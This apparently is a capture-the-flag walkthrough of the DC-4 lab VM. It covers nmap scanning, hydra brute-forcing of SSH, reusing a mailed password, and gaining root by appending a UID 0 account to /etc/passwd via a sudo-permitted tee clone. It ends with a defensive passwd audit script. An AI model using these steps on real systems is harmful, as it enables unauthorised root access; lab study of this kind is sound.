Information gathering:
yurang@kali:~$ nmap -sn 192.168.76.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 21:52 CST
Nmap scan report for 192.168.76.129
Host is up (0.0044s latency).
Nmap scan report for 192.168.76.131
Host is up (0.0038s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 19.71 seconds
yurang@kali:~$ nmap -A 192.168.76.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 21:53 CST
Nmap scan report for 192.168.76.131
Host is up (0.00055s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SSH and a web service are open; start by visiting the web page:
There is no SQL injection, so try brute-forcing the login:
The password turns out to be happy; log in to the web application.
The application can run commands, and by intercepting the request packet arbitrary command execution is possible. Attempts to create a file, or to modify the current file to write a one-line webshell, failed. An nc reverse shell only gives a low-privileged user. Looking at passwd shows three users with home directories.
In jim's home directory there is a backups folder containing a password file:
 
Read it out and save it as a wordlist, then use it to try to brute-force jim's SSH password:
root@kali:/home/yurang# hydra -l jim -P pass.txt ssh://192.168.76.131
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.76.131:22/
[STATUS] 177.00 tries/min, 177 tries in 00:01h, 76 to do in 00:01h, 16 active
[22][ssh] host: 192.168.76.131 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at
The password is jibril04; use it to SSH into the target:
[C:\~]$ ssh jim@192.168.76.131

Connecting to 192.168.76.131:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Thu Aug 6 09:40:40 2020 from 192.168.76.129
/usr/bin/xauth: file /home/jim/.Xauthority does not exist
jim@dc-4:~$ ls /var/mail/
jim
jim@dc-4:~$ ls -l /var/mail/
total 4
-rw-rw---- 1 jim mail 715 Apr 6 2019 jim
The login banner says there is new mail; reading it gives the password of user charles:

jim@dc-4:~$ more /var/mail/jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim, I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong. Password is: ^xHhA&hvim0y See ya,
Charles
As jim, run sudo -l to list the commands jim may run with sudo; there are none:
jim@dc-4:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for jim:
Sorry, user jim may not run sudo on dc-4.
jim@dc-4:~$
Switch user to charles (su charles with the password from the mail):
charles may run the teehee command as root without entering a password:
charles@dc-4:/home/jim$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:/home/jim$
teehee, whose help text is that of coreutils tee, copies standard input to files and with -a can append to a file:
charles@dc-4:/home/jim$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'
Use mkpasswd to generate a password hash (https://www.cnblogs.com/backlion/p/10503978.html):
root@kali:/home/yurang# mkpasswd -m SHA-512 12345
$6$qwK19pMRSUWqanoj$GjN71wScgFYrZLan.1mDFYvhPmalxzeBSptWrervQXLeuM9ZnnTi2FupYnlMEccb1UioDCo9AI2LH46tSkmnn0
root@kali:/home/yurang#
Construct a passwd entry for a new user with UID 0 (the hash goes directly in the password field, so /etc/shadow is never consulted):
test:$6$qwK19pMRSUWqanoj$GjN71wScgFYrZLan.1mDFYvhPmalxzeBSptWrervQXLeuM9ZnnTi2FupYnlMEccb1UioDCo9AI2LH46tSkmnn0:0:0:test:/root:/bin/bash
With sudo teehee -a, the user test is appended to passwd (teehee echoes each line it reads back to standard output, hence the repeated line; Ctrl-C ends the input):
charles@dc-4:/home/jim$ sudo teehee -a /etc/passwd
test:$6$qwK19pMRSUWqanoj$GjN71wScgFYrZLan.1mDFYvhPmalxzeBSptWrervQXLeuM9ZnnTi2FupYnlMEccb1UioDCo9AI2LH46tSkmnn0:0:0:/root/root:/bin/bash
test:$6$qwK19pMRSUWqanoj$GjN71wScgFYrZLan.1mDFYvhPmalxzeBSptWrervQXLeuM9ZnnTi2FupYnlMEccb1UioDCo9AI2LH46tSkmnn0:0:0:/root/root:/bin/bash
^C
charles@dc-4:/home/jim$ more /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
test:$6$qwK19pMRSUWqanoj$GjN71wScgFYrZLan.1mDFYvhPmalxzeBSptWrervQXLeuM9ZnnTi2FupYnlMEccb1UioDCo9AI2LH46tSkmnn0:0:0:/root/root:/bin/bash
Switch to the test user (password 12345) and obtain root:
charles@dc-4:/home/jim$ su test
Password:
# whoami
root

# vi /root/flag.txt

[ASCII-art banner]

Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
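The privilege escalation above leaves a clear trace in /etc/passwd: an extra UID 0 account, a crypt hash sitting in the password field instead of an "x", and (as typed in the session above) an entry with only six fields. The following audit script, added here as an example and not part of the original writeup, flags all three conditions; the sample passwd content is constructed from the listing above with a placeholder hash.

```python
import re

# Constructed sample modelled on the /etc/passwd listing in the writeup:
# normal entries plus the appended "test" line with an inline $6$ hash,
# UID 0 and only six fields (the hash itself is a placeholder, not real).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
test:$6$SALTPLACEHOLDER$HASHPLACEHOLDER:0:0:/root/root:/bin/bash
"""

# crypt(3)-style hashes start with "$<id>$" ($1$ md5, $5$ sha256, $6$ sha512, $y$ yescrypt)
CRYPT_HASH = re.compile(r"^\$[0-9a-zA-Z]+\$")


def audit_passwd(text):
    """Return a list of (user, issue) tuples for suspicious passwd entries."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        user = fields[0]
        # A well-formed entry has exactly 7 fields: name:pw:uid:gid:gecos:home:shell
        if len(fields) != 7:
            findings.append((user, "malformed entry: %d fields instead of 7" % len(fields)))
        password = fields[1] if len(fields) > 1 else ""
        if CRYPT_HASH.match(password):
            # A hash here is world-readable and bypasses /etc/shadow entirely
            findings.append((user, "password hash stored in passwd, not shadow"))
        elif password == "":
            findings.append((user, "empty password field (no password required)"))
        try:
            uid = int(fields[2])
        except (IndexError, ValueError):
            findings.append((user, "non-numeric or missing UID"))
            continue
        if uid == 0 and user != "root":
            findings.append((user, "UID 0 account other than root"))
    return findings


def flagged_users(text):
    """Names of users with at least one finding, in order of first appearance."""
    seen = []
    for user, _ in audit_passwd(text):
        if user not in seen:
            seen.append(user)
    return seen


if __name__ == "__main__":
    for user, issue in audit_passwd(SAMPLE_PASSWD):
        print("%-8s %s" % (user, issue))
```

On a live host, read /etc/passwd into audit_passwd() instead of the sample; the same checks apply to any file a NOPASSWD tee-style command can append to.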